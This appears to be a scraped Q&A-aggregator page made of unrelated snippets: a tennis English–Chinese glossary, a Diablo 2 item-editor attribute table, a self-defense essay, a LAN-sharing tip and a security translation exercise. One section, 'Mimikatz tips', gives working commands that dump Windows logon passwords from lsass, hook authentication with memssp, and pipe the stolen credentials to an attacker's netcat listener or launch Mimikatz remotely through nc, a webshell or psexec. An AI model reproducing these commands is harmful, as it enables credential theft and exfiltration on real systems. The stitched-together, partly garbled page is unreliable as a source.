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① identify your umbrella ②identified as ③can"t be identified with ④identiify wiih
2023-06-07 01:17:591


  网球术语英汉对照  A  ace 发球时,对方接球完没有碰触到球之得分球  advantage 占先,打到deuce后优势之一方,分发球占先及接球占先  advantage for receiver 接发球方占先  advantage for server 发球方占先  all 平(比分相同)  alley 单打与双打之间的场区  alley fighter 善于打硬仗和绝地反击的选手  alternate service 换发球  American twist 美式旋转球  approach shot 上网球  attacker 攻击型选手  attacking return 攻击性回球  asphalt courts 沥青球场  B  back court 后场  back-hand 反手击球  back-hand drop shot 反手放放球  back-hand half-volley 反手半截击  back-hand volley 反手截击  backspin 下旋球  ball 网球  ball boy 球童/拾球员  ball change 换球  ball sense 网感,球感  ball control 控球技术  band 球网白边  baseline ball 底线球  be quiet 安静  best of 3 sets 三盘两胜制  best of 5 sets 五盘三胜制  blade of racket 拍面  blocked return 堵截回击球  bodyline ball 贴身球/追身球  break point 破发点  bye 比赛轮空  C  cement court 水泥球场  centre bond 中心布带  centre mark 中点  centre service line 中线  chair-umpire 主裁判  change sides 交换  championship 锦标赛  champion 冠军  chip 切球  chop stroke 削球  classical guide 经典打法  clay court 红土场地/泥地  consistency 稳定性  continental 大陆式  correction 更正  court surfaces 场地表面  cover the court 防守  covered court 室内场地  cross shot 斜线球  cross-corner 对角球  crosscourt 斜线球  cut 削球  D  dark horse 黑马  deep ball 深球  default 弃权  defensive 防御性  deuce 局末平分, 盘末平局  disqualify 取消比赛资格  double bounces 球弹地两次  double break point 2个破发点  double fault 双误, 两次发球失误  double-handed backhand 双手反手击球  double hit 在一次挥拍中球碰撞球拍两次  double elimination tournament 双打淘汰赛  doubles side line 双打边线  doubles 双打  doubles court 双打场地  down-the-line shot 边线直线球/落底线球  depth shot 打深度球  driven return 抽击回击球  drop shot 吊小球/短球  E  eastern 东方式  eastern forehand 东方式正手  EPO(erythropoietin) 增强体能的违禁药物  etnaer service line 中线  event begins 赛事开始  exhibition 表演赛  F  fault 失误  fifteen 十五  fifteen all 一平  finish 比赛结束  first service 第一发球  fitness 状态  flat(cannon ball) 平击球(炮弹式)  flat drive 平抽球  flat stroke 平击球/平发球  fluke, set-up, easy 机会球  follow-through 跟进动作  foot fault 脚部犯规/脚误  footwork 步法  fore court 前场  forehand 正手  forehand half-volley 正手半截击球  forehand volley 正手截击球  forward spin 上旋  forty 四十  forty all 三平  foul 发球出界、无效球  foul shot 技术犯规  G  game 局(1局为四分)  giant slayer 巨人杀手  good ball 好球  good return 有效回击  grab-punch position 截击位置  grandslam 指Wimbledon/U.S. Open/French Open/Australian Open四大赛事  grass court 草地网球场  grip 握拍姿势/握拍法  ground ball 落地球  ground stoke 击触地球,即球落地弹起后再击球,是最基本的打法(抽球)  gut, string (球拍的)弦  H  half-volley 半截击球/反弹球  hand signal 手势  handle of racket拍柄  hard court 硬地场地  heavy ball 重球  hinder 妨碍/干扰  hindrance 妨碍  hitting the ball 击球  high ball, lob 高球  form 状态  hot shot 热门人物  I  in 界内有效球  in-form 球感极佳  interference 干扰  interruption 中断比赛  J  jump smash 跃起抽球  just out 刚好出界  K  kill 杀球,使对方无力防守之球  knee 膝  knock-out 淘汰赛  L  lawn tennis 草地网球运动  lead 领先  left service court 左发球区  let 重发球/重赛  lift drive 提拉抽球  lift 拉弧圈球  line ball 触线球  linesman 司线员  lob 吊高球/挑高球  long ball/shot 长球  love 0分(出自法语)  love game 一方得零分的一局  low ball 低球  low drive 抽低球  low volley 低截球  M  macadam 碎石  make the draw 抽签  match 记分  match point 赛末点  mental skills 心理状态  mixed 混双  N  net 落网球/发球触网,分net in(有效)及net out(无效)两种  net-cord judge 球网裁判员  net-post 网柱  net rusher 上网型选手  no-man"s-land 真空地带  not up 两跳,球在地上弹跳两次  O  obscurity 冷门  offensive 进攻性  order of receiving 接发球次序  order of service 发球次序  out 界外无效球  out court 场外地区  out-of-form 球感不好  over-grips 护柄带  over the net 球过网  overhead 高球  overhand service 上手发球  overhead smash, overhand smash 高球扣杀  overrules 改判  P  partner 伙伴  passing shot 穿越球  percentage play 沉着应战  permanent fixtures 场上的固定物  placement 球落点  place-up 抛球  play 比赛开始  player 参赛者  point penalty 罚分  point score 比分  point-up 指着球  pole 网柱  postpone 延期比赛  progressive playing 改善打发  R  racket press 球拍夹  racket 球拍  racquet 球拍  ranking 排名  ready 准备比赛  ready position 预备位置  receive 接发球  receiver 接球员  receiving formation 接发球的位置  referee 裁判  return回击球  right service court 右发球区  rules 规则  round 轮  round robin tournament 循环赛  S  score 得分  second service 第二发球  seed buster 种子克星  seeding player 非种子球员  seeded player 种子球员  sensation 热门人物  serve 发球  server 发球员  service 发球  service area 发球区  service court 发球区  service line 发球线  service return 回发球  set 盘(6局为一盘)  set point 盘末点/盘点  short shot 短球  shots 球路  side line 边线  sideline ball 边线球  sidespin 侧旋转球  single court 单打场区  single elimination tournament 单淘汰赛  single net post 单打支柱  single side line 单打边线  sitter 极容易的“菜”球  slice 侧旋球  slice service 削发球  smash 抽球/抽球  scoring in tie-break 决胜局计分  spin 旋转球  split-stepping 分开两脚站立  stamina 耐力  stance 站姿  statistics 技术统计  straight ball 直线球  strap 中央带,球网中带  stretching exercises 伸展运动  strings 球拍线  suspension 暂停比赛  surface of ball 球面  surprise return 突然的回击  suspension 暂停  swing 挥拍  T  tactics 战术  take-back 拉拍  tennis 网球运动/网球  tennis lines 网球场上的线  tennis togs 网球衣  thirty 三十  thirty all 二平  through the net 穿网球  throwing position 准备击球姿势  tie-break 决胜局/抢七局,正赛未分胜负后的加赛  tie-breaker 平局决胜制  time 时间到  timing 击球时间的掌握  top spin 上旋球  toss 抛球  turn 转身  triple break point 3个破发点  twist 强烈旋转球  U  umpire 裁判  underhand service 下手发球  underspin 下旋球  unsighted 没看见  up-and-comer 处于上升期的新人  upset artist 爆冷专家  V  volley 截击空中球  W  warm-up 热身运动/准备活动  western 西方式  wide 打出边线的球  wide ball 离身球  wind up 收拍  winner 胜利者/致胜球  wood 木板  wooden court 木板场地  wrap-around 包卷打法  wrist 腕  草地球场 grass court  拍面 blade of racket  场外地区 out court  中线 centre service line  木板场地 wooden court  拍柄 handle of racker  网球衣 tennis togs  网柱 pole  网球鞋 tennis shoes  球面 surface of ball  发球区 service area  发球得分 ace  水泥球场 cement court  中心布带 centre band  单数局 advantage(ad) court  室内场地 covered court  上网 advance to the net  控制落点得分球 ace placement  发球占先 advantage in  盘末平局 advantage game  接球占先 advantage out  再平分 Again  抽出角度来 angle the drive  上网 approach the net  试图击球 attempt a stroke  沥青球场 asphait court  后场打法 backcourt play  后场球员 backcourt player  后挡 background  反手握拍法 backhand grip  反手扣杀 backhand smash  反手击球 backhand  左场区 backhand court
2023-06-07 01:18:071

Udietoo for D2装备附加效果修改,我见过一篇文章把英文译成了中文,很详细,现求此文章

UdieToo中文属性对照表 Strength / +223力量 Energy / +95精力 Dexterity / 95敏捷 Vitality 增加95体力 Stat Points 没用 Skill Points 没用 Life 没用 Max Life / +479生命 Mana 没用 Max Mana / +223法力 stamina 没用 Max Stamina / +223耐力最大值(鞋专用)level 没用 experience 没用 gold 没用 goldbank 没用 Enhanced Defense% / +511%防御强化 Enchanced Damage% / +511%增强伤害 Enchanced Min Dmg% / 增加伤害底限Attack Rating / +1023准确率 Chance of Blocking % / %63增加格挡可能性Min 1-handed Dmg 单手+63最小伤害值 Max 1-handed Dmg 单手+123最大伤害值Min 2-handed Dmg 增加双手+63最小伤害值Max 2-handed Dmg 增加双手127最大伤害值Damage % nv 伤害增加百分比Regenerate Mana % nv / 法力重生255%Regenerate Mana Plus % / 法力重生255%(隐藏) Heal Stemina Plus % 恢复耐力加255% lastexp 没用 nextexp 没用 Defense 增加防御 2037Def vs Missile /+511对飞射性防御Def vs Melee / +255对近战防御Damage Reduced By / 伤害减少63Magic Dmg Reduced By 魔法伤害减少63 Damage Reduced By % 伤害减少百分比 255%Magic Resistance % 魔法抵抗百分比 255%Max Magic Resistance % 百分比增加最大魔法抵抗的百分比 31%Fire Resistance % 增加火抗的百分比 205%Max Fire Resistance % 增加最大火抗的百分比 31%Lightning Resistance % 增加电抗的百分比 205%Max Lightning Resistance % 增加最大电抗的百分比 31%Cold Resistance % 增加冰抗的百分比 205%Max Cold Resistance % 增加最大冰抗的百分比 31%Poison Resistance % 增加毒抗的百分比 205%Max Poison Resistance % 增加最大毒抗的百分比 31%damageaura 没用 Fire Damage 增加火焰伤害 255-511Max Fire Damage 增加火焰伤害最大值 +511Lightning Damage 增加闪电伤害 255-511Max Lightning Dmg 增加闪电伤害最大值 +511Magic Damage 增加魔法伤害 255-511Max Magic Damage 增加魔法伤害最大值 +511Cold Damage 增加寒冷伤害 255-511Max Cold Damage 增加寒冷伤害最大值 +511Cold Length 冻结目标的时间 Poison Damage / 加2042毒素伤害20秒Max Poison Dmg / +1023毒素伤害上限Poison Length 目标中毒的持续时间 Life Stolen Per Hit Min / 127%击中偷取生命Life Stolen Per Hit Max 偷取生命 Mana Stolen Per Hit Min / 127%击中偷取法力 Mana Stolen Per Hit Max 偷取法力 Stamina Drain Min 没用 Stamina Drain Max 没用 Stun Length 使目标眩晕的时间 Run/Walk Speed % nv 跑步速率增加百分比(隐藏) Attack Speed % nv 攻击速率增加百分比(隐藏) other_animrate 没用 quantity 没用 value 没用 Durabilty 没用 Max Durability 增加装备耐久 Replenish Life 自行恢复生命值 Max Durability % 没用 Life % 增加生命上限53% Mana % 增加法力上限53% Attacker Takes Damage Of 反伤 127Extra Gold From Monsters % 怪掉的钱增加 411%Chance Of Getting Magic Items % 这个就是MF155%Knock Back 击退 Time Duration (未测试) Add Class Skill 为 0亚 1法 2死 3圣 4野 5德 6刺 +7技能Unsentparam1 未知属性1 Add experience 增加461%得到的经验值 Heal after kill 加127生命在杀死一只怪物后 Reduced prices 降低商人价格127% Double Herb Duration (未测试) Light Radius 增加11光照范围 Light Color nv 光照范围(隐藏) Requirements % 物品对基本属性的需求+155% Level Require 没用 Increased Attack Speed 提升攻击速度% Level Require % 增加等级需求 Last block frame 格挡有关 Faster Run/Walk% 提升跑步速度107%Non Class skill 无职业限制技能 state 特殊状态,比如头上永远顶个经验祭坛 Faster Hit Recovery Rate / +107%快速再度攻击Monster player count 没用 Poison override 没用 Faster Block Rate / +107%较快速格挡率Bypass undead 没用 Bypass demons 没用 Faster Cast Rate / +107%高速施展速度Bypass beasts 没用 Single Skill 增加职业限制技能 / +7★致 Rest in peace 杀死怪物后恢复平静 Curse resistance 抗诅咒几率 Poison Length Reduced By % 自己的中毒时间减少 Damage 增加伤害 Hit Causes Monster To Flee % 使怪物怪物会逃跑 Hit Blinds Target 打中的敌人会失明 Damage To Mana % 受损生命转化为提高法力 Ignore Target Defense 无视目标防御 Target Defense % -127%目标防御Prevent Monster Heal 防止怪物自疗Half Freeze Duration 自己的冰冻时间减半 Bonus To Attack Rating % / 491%额外攻击准确率加成 Reduce Monster Defense per Hit / -1每次击中降低怪物防御 Damage To Demons % +491%对恶魔的伤害Damage To Undead % +491%对不死生物的伤害 Attack Rating Against Demons +895对抗恶魔准确率 Attack Rating Against Undead +895对抗不死生物准确率Throwable / 可投掷 Elemental Skill 增加火焰技能 +7All Skill Levels 增加所有技能 +7Attacker Takes Lightning Dmg Of 攻击者受到电伤害 31ironmaiden_level 没用 lifetap_level 没用 thorns_percent 没用 bonearmor 没用 bonearmormax 没用 Attack Freezes Target 冻结目标 +31Chance of Open Wounds 撕开伤口的几率127% Chance of Crushing Blow 压碎攻击的几率 127%Kick Damage 增加脚踢伤害127 Mana After Each Kill 加127法力在杀死一只怪物后 Life After Each Demon Kill 加127生命在杀死恶魔系怪物后 Extra Blood 没用 Chance of Deadly Strike 致命攻击的几率127%Fire Absorbs % 火焰吸收127% Fire Absorbs 火焰吸收127 Lightning Absorbs % 闪电吸收127% Lightning Absorbs 闪电吸收 127Magic Absorbs % 魔法吸收127% Magic Absorbs 魔法吸收127 Cold Absorbs % 冰冷吸收127% Cold Absorbs 冰冷吸收127 Slows Target By % 使目标减缓127% Aura / 等级31★灵气赋予Indestructible 装备无法破坏 Cannot be Frozen 不会被冻结 Slower Stamina Drain % / 107%减慢精力消耗 ReAnimate 杀死怪物后复活为 Pierce Attack % 穿透攻击 Fire Magic Arrows or Bolts 射出魔法箭 Fire Explosive Arrows or Bolts / 箭矢或十字弓弹火焰爆炸Min Throw Dmg nv 增加百分比最小远程攻击 Max Throw Dmg nv 增加百分比最大远程攻击 UnCoded 未知属性 UnCoded UnCoded UnCoded UnCoded UnCoded UnCoded UnCoded UnCoded UnCoded UnCoded UnCoded UnCoded UnCoded UnCoded UnCoded UnCoded UnCoded Attack Vs Monster 对特定怪物增加命中率 Damage Vs Monster 对特定怪物增加伤害 fade 身体透明化 Armor override % 无视防御Unused183 … Unused184 … Unused185 … Unused186 … Unused187 … Add Skill Tab 加入单系技能 Unused189 没用 Unused190 … Unused191 … Unused192 … Unused193 … Increased Sockets 增加凹槽(需先激活) Skill On Attack 攻击时释放特定魔法 Skill On Kill 杀死怪物时释放特定魔法 Skill On Death 自己死亡时放特定魔法 Skill On Hit 打中时释放特定魔法 Skill On Levelup 升级时释放特定魔法 Unused200 没用 Skill On Get Hit 被打中时释放特定魔法 Unused202 没用 Unused203 … Charged Skill 特定聚气技能 Unused205 没用… Unused206 … Unused207 … Unused208 … Unused209 … Unused210 .. Unused211 … Unused212 .. Unused213 … Defense (on Lvl) 按等级增加防御 Enhanced Defense (on Lvl) 按等级提高防御 Life (on Lvl) 按等级提高生命值 Mana (on Lvl) 按等级提高魔法值 Maximum Damage (on Lvl) 按等级提高最大伤害 Enhanced MaxDmg (on Lvl) 按等级提高最大伤害% Strength (on Lvl) 按等级增加力量 Dexterity (on Lvl) 按等级增加敏捷 Energy (on Lvl) 按等级增加精力 Vitality (on Lvl) 按等级增加体力 Att Rating (on Lvl) 按等级增加命中率 Bonus to Att Rating % (on Lvl) 按等级提高额外的命中率 Maximum Cold Dmg (on Lvl) 按等级增加最大寒冷伤害 Maximum Fire Dmg (on Lvl) 按等级增加最大火伤害 Maximum Lightning Dmg (on Lvl) 按等级增加最大闪电伤害 Maximum Poison Dmg (on Lvl) 按等级增加最大毒伤害 Cold Resistance % (on Lvl) 按等级增加百分比冰抗 Fire Resistance % (on Lvl) 按等级增加百分比火抗 Lightning Resistance % (on Lvl) 按等级增加百分比电抗 Poison Resistance % (on Lvl) 按等级增加百分比毒抗 Absorbs Cold Damage (on Lvl) 按等级提高吸收寒冷伤害能力 Absorbs Fire Damage (on Lvl) ……吸收火伤害能力 Absorbs Lightning Damage (on Lvl) ……吸收闪电伤害能力 Absorbs Poison (per lvl) "很诱惑的属性,不过没用" Attacker Takes Damage of (on Lvl) 按等级反伤 Extra Gold From Monsters % (on Lvl)按等级提高怪掉的钱 Chance of Getting Magic Items % (on Lvl) 按等级提高MF几率 Heal Stamina Plus % (on Lvl) 没用 Maximum Stamina (on Lvl) 没用 Damage to Demons % (on Lvl) 没用 Damage to Undead % (on Lvl) 没用 Att Rating against Demons (on Lvl) 没用 Att Rating against Undead (on Lvl) 没用 Chance of Crushing Blow (on Lvl) 按等级提高压碎攻击的几率 Chance of Open Wounds (on Lvl) ……提高撕开伤口的几率 Kick Damage (on Lvl) 按等级提高踢伤害 Chance of Deadly Strike (on Lvl) 按等级提高致命攻击几率 Find Gems per level 没用 Repair 1 Durability In Seconds 按时间恢复耐久 Replenish 1 Quantity In Seconds 回复数量 Increased Stack Size 增加数量 UnCoded 没用 UnCoded … UnCoded … UnCoded … UnCoded … UnCoded … UnCoded .. UnCoded … UnCoded . UnCoded .. UnCoded . UnCoded . UnCoded . Defense (by Time) [1] 以下为属性/时间 Defense (by Time) [2] Life (by Time) Mana (by Time) Max Damage (by Time) [1] Max Damage (by Time) [2] Strength (by Time) Dexterity (by Time) Energy (by Time) Vitality (by Time) Attack Rating (by Time) [1] Attack Rating (by Time) [2] Max Cold Dmg (by Time) Max Fire Dmg (by Time) Max Lightning Dmg (by Time) Max Poison Dmg (by Time) Cold Resistance % (by Time) Fire Resistance % (by Time) Lightning Resistance % (by Time) Poison Resistance % (by Time) Absorbs Cold Damage (by Time) Absorbs Fire Damage (by Time) Absorbs Lightning Damage (by Time) Blessed Aim Gold From Monsters % (by Time) Find Magic Items % (by Time) Heal Stamina Plus % (by Time) Max Stamina (by Time) Damage vs Demon % (by Time) Damage vs Undead % (by Time) Attack Rating vs Demon (by Time) Attack Rating vs Undead (by Time) Chance of Crushing Blow (by Time) Chance of Open Wounds (by Time) Kick Damage (by Time) Chance of Deadly Strike (by Time) item_find_gems_bytime 没用 ITEM_PIERCE_COLD / -205%对敌人冰冻系抗性 ITEM_PIERCE_FIRE / -205%对敌人火焰系抗性 ITEM_PIERCE_LTNG / -205%对敌人闪电系抗性 ITEM_PIERCE_POIS / -205%对敌人毒素系抗性item_damage_vs_monster 没用 item_damage_percent_vs_monster … item_tohit_vs_monster … item_tohit_percent_vs_monster … item_ac_vs_monster … item_ac_percent_vs_monster … firelength … burningmin … burningmax … progressive_damage … progressive_steal .. progressive_other .. progressive_fire … progressive_cold … progressive_lightning … item_extra_charges … progressive_tohit … poison_count … damage_framerate … pierce_idx … PASSIVE_FIRE_MASTERY / +461%对火焰技能伤害 PASSIVE_LTNG_MASTERY / +461%对闪电技能伤害 PASSIVE_COLD_MASTERY / +461%对冰冷技能伤害 PASSIVE_POIS_MASTERY / +461%对毒素技能伤害PASSIVE_FIRE_PIERCE / -255%对敌人火焰系抗性 PASSIVE_LTNG_PIERCE / -255%对敌人闪电系抗性 PASSIVE_COLD_PIERCE / -255%对敌人冰冷系抗性 PASSIVE_POIS_PIERCE / -255%对敌人毒素系抗性passive_critical_strike 不清楚 passive_dodge 三闪之一 passive_avoid 三闪…… passive_evade 三闪…… passive_warmth 热情 passive_mastery_melee_th 未测试 passive_mastery_melee_dmg … passive_mastery_melee_crit … passive_mastery_throw_th … passive_mastery_throw_dmg … passive_mastery_throw_crit … passive_weaponblock … passive_summon_resist … modifierlist_skill 没用 modifierlist_level 没用 last_sent_hp_pct 没用 source_unit_type 没用 source_unit_id 没用 shortparami 未测试 questitemdifficulty 未测试 passive_mag_mastery 未测试
2023-06-07 01:18:153

Mimikatz 使用小技巧

1.记录 Mimikatz输出: C:>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir 2.将输出导入到本地文件: C:>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt 3.将输出传输到远程机器: Attacker执行: E:>nc -lvp 4444 Victim执行: C:>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 4444 为Attacker IP 4.通过nc远程执行Mimikatz: Victim执行: C:>nc -lvp 443 Attacker执行: E:>nc.exe -vv 443 -e mimikatz.exe 为Victim IP 若管理员有每过几天就改密码的习惯,但是 mimikatz 抓取到的密码都是老密码 用QuarksPwDump等抓的hash也是老hash,新密码却抓不到的情况下 可以使用以下方法尝试解决 privilege ::debug misc::memssp 记录的结果在c:windowssystem32mimilsa.log 每次验证都会记录 如 锁屏 等 重启失效 出现如上问题是因为管理一直没注销过,都是直接断开连接,lsass进程里面还吃存放的老的。 也可以直接logoff,但是这样会很明显。 文件 mimikatz . exe 、sekurlsa.dll、PsExec. exe (3389) 本机终端 绝对路径[mimikatz]( privilege::debug inject::process lsass.exe "绝对路径sekurlsa.dll" @getLogonPasswords exit webshell 绝对路径mimikatz.exe < 绝对路径c.txt > 绝对路径userpass.txt ———-c.txt———- privilege::debug inject::process lsass.exe "绝对路径sekurlsa.dll" @getLogonPasswords exit ————————- 远程终端 psexec.exe -s cmd.exe 绝对路径mimikatz.exe privilege::debug inject::process lsass.exe "绝对路径sekurlsa.dll" @getLogonPasswords exit 原文地址:Mimikatz 使用小技巧:
2023-06-07 01:18:221


2023-06-07 01:18:291


2023-06-07 01:18:495


    One of the topics that runs through all SAFE International Self Defense seminars is discussion on “How being too polite can be dangerous”. Yes, being too polite can be dangerous. Someone who is going to harm you is going to look for someone they can take advantage of. I am not sure how many self defense companies talk about this issue, but it is very important to cover when teaching civilians in a standard self defense course.SAFE International makes this topic a priority in its teachings. If someone offers you help and you feel uncomfortable, and your intuition kicks in, say “NO” in a confident manner, not in a threatening one. If they keep persisting, they are ignoring the answer you just gave them which is a big warning sign.  An attacker only requires a split second to distract you in order to gain access to your personal space to accomplish their goal of harming you. Often someone will distract you with some daily routine you have experienced thousands of times such as asking you for the time or asking for directions. Because you have given the time or directions possibly hundreds of times without any problems in the past, you don"t hesitate to look down at your watch or turn your back to them. It is this looking away from them that gives them that split second to make their move. Now, I am not saying you should not help people, but if that one time your intuition triggers some hesitation, listen to it. Do not let the pressure to be polite overrule your intuition.  Kids are often taught from a very young age to always be polite to people who are older. Yes, I think teaching politeness is great, but, again, include teaching your kids to trust their gut feelings, and let them know they will not get into trouble for trusting their intution. It is also common for an “attacker” to make their potential victim feel guilty in order to accomplish their goals. Using guilt is another very effective strategy that fits into this discussion of being too polite. If kids are taught to always be polite, it will most likely carry forward into their adult years.  Even in the face of massive intuition that something is not right, that programming to be polite can override the intuition. Nothing should override one"s intuition. Someone who is thinking of harming you can quickly determine if you fall into this category by getting close step by step and evaluating your body/verbal language. An attacker does not want you attracting attention to the scenario, and one who is too polite is less likely to gain attention, due to the fear of being wrong and embarrassing themself. Do not feel obligated to accept someone"s help. If they try to make you feel guilty, this just confirms your intuition to begin with.  for someone who they can take advantage of. An attacker is not looking for a challenge but rather an easy victim.  If someone offers you help and you feel uncomfortable or your intuition kicks in, say "NO". If they keep persisting, they are ignoring the answer you just gave them. Do not feel obligated to accept someone"s help and if they try to make you feel guilty, this just confirms your intuition to begin with. We teach children that they must be polite to adults. This is wrong and could be potentially dangerous.  Teach children, teens and adults to trust their inner voice or intuition. I would much rather offend a complete stranger than have something dangerous happen to me because I felt like they had to be polite to this person. Again, if someone ignores you saying "NO", they are trying to control you somehow. The word "no" is a complete sentence.  I recommend when you need help to ask for it rather than have someone offer help to you. If you choose the person you ask for help there is very little chance of anything dangerous happening. I also suggest that women offer women help. Women are much more likely to be harmed by a male than some woman who has offered assistance. Being polite is nice but being too polite can just be dangerous.  In closing, always trust your intuition. I would much rather get out of a situation feeling foolish and be able to laugh about it later.  A couple of days ago, my mother gave me a call. From the moment I answered the phone, I could sense that something was wrong. She sounded uncomfortable, and even a little scared. While making a quick trip out to the local Super Walmart, she had leaned over to grab something off a low shelf, and someone bumped into her rear end. Awkward as it may have been, she gave the stranger the benefit of the doubt, and brushed it off as an accident and continued hunting down the rest of the items on her shopping list. However, a few minutes later, she realized that a large male shopper was not-so-casually following her through the aisles. Being the polite lady my mother is, she first assumed that she and he must have similar grocery needs, but she made a mental note to keep an eye on the stranger. She noticed that although he looked at the shelves now and then, he never put anything into his cart. And, wherever she went, he popped up about half an aisle down moments later. That sent her red flags. This particular shopper wasn"t looking to restock his kitchen cabinets. She abandoned the rest of her grocery list and began to actively try to shake her unwanted escort.  Eventually, my mother was able to put some distance between her and the tall stranger, check out with her groceries, and high tail it out to the parking lot. When she recounted the event to me on the phone during her drive home from Walmart, my first response was, “See Mom, that kind of stuff is why I concealed carry.” But, carrying in and of itself doesn"t prevent dangerous situations like what my mother experienced. In fact, it is dangerous to presume that a permit alone will ensure its holder is “safe.” After we hung up, I thought about what I would have done had I accompanied her for that particular shopping trip. Had I been with her and witness this uncomfortable stranger"s advances, I would have responded to him – loudly. Making a scene (I don"t necessarily mean jumping up and down and screaming, just something as simple as, “Hey, I noticed you shopping behind us; can I help you with something?” ) would have undoubtedly embarrassed my mother, but drawing negative attention to the man might have been enough to dissuade him from his pursuit. Not to mention, had I gone shopping with my mum, the two of us together may not have even registered an easy enough target and he may not have attempted to follow my mother in the first place.  Generally, being polite and safe are not mutually exclusive. But, there are occasions when dangerous situations can be averted by acting outside of what is considered socially acceptable. On the other hand, there are also times where it is imperative to be as polite as possible in order to avoid escalating an interaction to violence. The creepy guy from my mother"s shopping trip is one example of a a dangerous situation that may have been avoided had my mother been less polite. However, those of us who concealed carry firearms also need to consider the flip side of that coin: when is it more safe to be extra polite?  The video by my friend Allen, from the YouTube channel ZombieTactics, discusses very well the responsibility of those who concealed carry of avoiding dangerous situations (the entire video warrants a watch, but the section which I"m referencing in particular begins at 7:40). One example that Allen provides in his video demonstrates this concept. This is his proposed circumstance: You"re in out with your significant other in line to enter the venue for a huge concert. A belligerent drunken fellow concert-goer shoves your date, knocking them to the ground hard enough to injure them in the fall. Is it unreasonable for you to confront the offender and address his misdeeds against your partner? I don"t believe so. However, approaching this individual with the goal of chastising or otherwise reprimanding them has great potential to feed their already-present aggression, and may very possibly end in violence. Any violent situation is immediately more serious for someone who carries a firearm, because if the violence becomes severe enough, they have the ability to respond with lethal force. In this example, being polite enough to the aggressor to walk away and disengage from the interaction is more safe than confronting them because of the potential for the exchange to become violent.  Where is the line between when it is acceptable to forgo social etiquette in order to stay safe? I imagine this line is different for different people. And when does it become more safe to avoid or gracefully end an uncomfortable interaction? Because there are an infinite amount of circumstances that could put one in a risky situation, there is no single response that can guarantee your safety. It is therefore important for you to be able to recognize when it is more safe to abandon socially considerate responses, and when it is safer to be more polite than your potential aggressors. How will you respond?
2023-06-07 01:19:041


1、局域网共享需要共享电脑在同一网段,例 电脑A的IP:;另一台B为:; 2、各电脑的共享已经打开才能搜巡到。
2023-06-07 01:19:121


2023-06-07 01:19:193

The word enemy in Paragraph 3 refers toA.attackerB.huntedC.hunter

2023-06-07 01:19:271


2023-06-07 01:19:343


2023-06-07 01:19:412


英译汉 (1)黑客是谁的人创建和修改计算机软件和计算机硬件,包括电脑编程,黑客是软件设计师和程序员谁建立高雅,美丽方案和系统。 (2)攻击是一种对计算机系统或由于故意,智能网络攻击行动的结果,例如,服务攻击,渗透和强力攻击sabotage.Such,否认字典攻击,服务攻击,重放攻击拒绝,捎带,渗透和破坏活动。 (3)网络扫描是一个计算机网络,收集有关计算机系统,它可用于ststem维修,安全评估和调查使用的信息的使用,和进攻。 (4)加密讯息,发件人使用收件人的耻骨,解密密钥只能由收件人的成对的私钥。 (5)直到近代,cryptograghy几乎只提到加密,不可理解的东西转化为普通的信息(明文)的过程,这是一个ciphertext.Decryption则相反,从不懂到移动明文密文。 (6)在密码学中,加密哈希函数是一个与某些额外的安全性能,使其散列函数作为一种原始的使用各种信息安全应用,例如身份验证和消息完整性,合适。 (7)对称密钥加密的加密方法,是指在该发送者和接收者都共享相同的键(或较少见,其中他们的密钥是不同的,但在一个轻松可计算的方式有关)。(8)除加密,公钥加密,可以用来实现数字签名数字签名schemes.A是一个普通的签字让人联想到,他们对任何人都有他们的特点,易于为用户生产,但难以伪造其他English Translation (1) active attack will cause the network to change the system state and services. Active attacks include attempts to block or break the protection mechanisms, the introduction of malicious code, theft or tampering with information. Active attacks may result in disclosure of data and dissemination of, or result in denial of service and data tampering, including most of the attempts by unauthorized users and non-normal means and the normal means of access to the remote system. (2) process is generally complete the first attack hide itself, after hiding their own during the pre-attack detection, detection of the target machine"s various properties and conditions have been attacked; and then take the appropriate method of attack to destroy, to achieve their After their attackers to delete their behavior in the target system log. (3) denial of service (Denial of Servive, called Dos attack), is under attack through illegal exclusive services to the target system, and ultimately try to prevent legitimate users from using the network provided by the target service. The most common denial of service attack is the attacker by producing a large number of victims of the network packet flow, consume all the available bandwidth of the network. (4) Modern cryptography is a fundamental principle: all the secrets are being present in the key. The implication is that in the design of cryptographic systems, cryptographic algorithms always assume that is open, the real need for confidentiality is the key. This is because the relative key encryption algorithm is more likely to leak. (5) symmetric cryptography passwords need to achieve through secure password access are passed to debit the sender. The password system advantages are: high security, fast encryption speed. The disadvantage is: With the expansion of the network, the management of a difficult key; not solve the confirmation message; lack the ability to automatically detect the key leakage. (6) public-key password is also called asymmetric key password. Password using the public key used for each (continued
2023-06-07 01:19:495